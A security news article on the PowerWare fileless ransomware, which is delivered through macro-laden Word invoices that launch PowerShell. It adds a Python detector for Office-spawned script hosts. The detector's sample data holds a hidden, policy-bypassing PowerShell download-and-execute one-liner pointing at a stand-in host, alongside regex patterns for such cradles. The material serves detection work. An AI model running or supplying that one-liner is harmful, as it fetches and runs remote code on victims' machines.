A week ago, malware specialists at the security firm Carbon Black reported a new threat, dubbed PowerWare, a ransomware strain that abuses PowerShell, the scripting framework built into Windows.
Ransomware authors keep adding new features to make their malware more dangerous and effective.
What is really interesting about PowerWare is that it is fileless. Plenty of malware in the wild already works this way, including one variant of the popular Angler Exploit Kit, but the technique is still rare in ransomware.
The criminals behind PowerWare distribute it through spam messages carrying a Word document attachment that purports to be an invoice. They also rely on an old trick to convince victims to enable macros: the document claims that macros must be enabled to view it correctly.
The macro runs cmd.exe, which in turn launches PowerShell, the native Windows framework that exposes a command-line shell and scripting language for administrative tasks.
It is precisely this use of PowerShell that lets the ransomware avoid writing a new executable to disk, which makes detection harder; the same PowerShell script also carries out the file encryption on the victim's PC. Note that "fileless" here means no new binary is dropped: the script still runs inside powershell.exe, so process lineage (winword.exe spawning cmd.exe and powershell.exe) and PowerShell script-block logging remain viable detection points.
“The macros are there to launch PowerShell and pull down the ransomware script. Lots of malware can be distributed via macros in Word docs. Most of the time they download additional binaries to do more bad stuff (backdoors, etc.),” Carbon Black’s Valdez explained.
“This does not pull down any additional binaries (executables), and leverages PowerShell (already on the system and approved to be there) to do the dirty work.”
“This means no ‘traditional’ malware – no additional executable needed – just a text document (script),” he added.
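The delivery chain described above (Word macro, then cmd.exe, then a PowerShell download-and-execute one-liner) leaves a recognisable trail in process-creation telemetry even when no new executable touches disk. The following is an added example, not Carbon Black's code and not PowerWare's actual commands: it scores process events by parent lineage and by command-line traits typical of download cradles. The event records, field names and command lines are constructed to resemble Sysmon Event ID 1 style data and are purely illustrative.

```python
"""Process-lineage detection for macro-launched PowerShell.

Added example (not Carbon Black's code). Events below are constructed
to resemble process-creation telemetry; the command lines are
illustrative and do not reproduce PowerWare's real script.
"""
import re
from dataclasses import dataclass

# Office applications that should rarely spawn a shell or script host.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits typical of download-and-execute PowerShell one-liners.
SUSPICIOUS_ARGS = {
    "encoded-command": re.compile(r"(^|\s)-e(c|nc|ncodedcommand)?(\s|$)", re.I),
    "hidden-window":   re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no-profile":      re.compile(r"-nop(rofile)?\b", re.I),
    "policy-bypass":   re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I),
    "download-cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "dynamic-eval":    re.compile(r"\biex\b|invoke-expression", re.I),
}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # basename of the executable, e.g. "powershell.exe"
    cmdline: str


def ancestors(event, by_pid, max_depth=8):
    """Walk the parent chain; returns ancestor events, nearest first."""
    chain, cur, seen = [], event, set()
    while cur.ppid in by_pid and cur.ppid not in seen and len(chain) < max_depth:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        chain.append(cur)
    return chain


def analyze(event, by_pid):
    """Return the reasons this process looks suspicious (empty list if none)."""
    if event.image.lower() not in SCRIPT_HOSTS:
        return []
    reasons = []
    # Lineage check: any Office app above this script host in the tree.
    for anc in ancestors(event, by_pid):
        if anc.image.lower() in OFFICE_APPS:
            reasons.append(f"office-ancestor:{anc.image.lower()}")
            break
    # Command-line check: flags and cradles common to in-memory loaders.
    for name, rx in SUSPICIOUS_ARGS.items():
        if rx.search(event.cmdline):
            reasons.append(name)
    return reasons


def detect(events, min_reasons=1):
    """Return {pid: reasons} for every script host that trips >= min_reasons."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for e in events:
        reasons = analyze(e, by_pid)
        if len(reasons) >= min_reasons:
            findings[e.pid] = reasons
    return findings


# Constructed sample: a macro-launched cradle next to a benign admin script.
_CRADLE = ("powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
           "-Command \"IEX (New-Object Net.WebClient)"
           ".DownloadString('http://example.invalid/script.ps1')\"")
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winword.exe",
              '"C:\\Program Files\\Microsoft Office\\WINWORD.EXE" invoice.doc'),
    ProcEvent(300, 200, "cmd.exe", "cmd.exe /c " + _CRADLE),
    ProcEvent(400, 300, "powershell.exe", _CRADLE),
    ProcEvent(500, 100, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

Lineage alone is a strong signal (Word has little legitimate reason to spawn cmd.exe), and the command-line traits add confidence; tune `min_reasons` to the noise level of your estate. Because the downloaded script is executed by powershell.exe, PowerShell script-block logging (event 4104 in the Microsoft-Windows-PowerShell/Operational log on PowerShell 5 and later) records its content even though it never lands on disk, which complements this process-based check.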
PowerWare demands a $500 ransom to restore the victim's encrypted files, and the ransom doubles if the victim misses the deadline.
Fileless malware is clearly gaining popularity among criminals. On March 11, security researchers disclosed another fileless malware family, PowerSniff, which has much in common with PowerWare.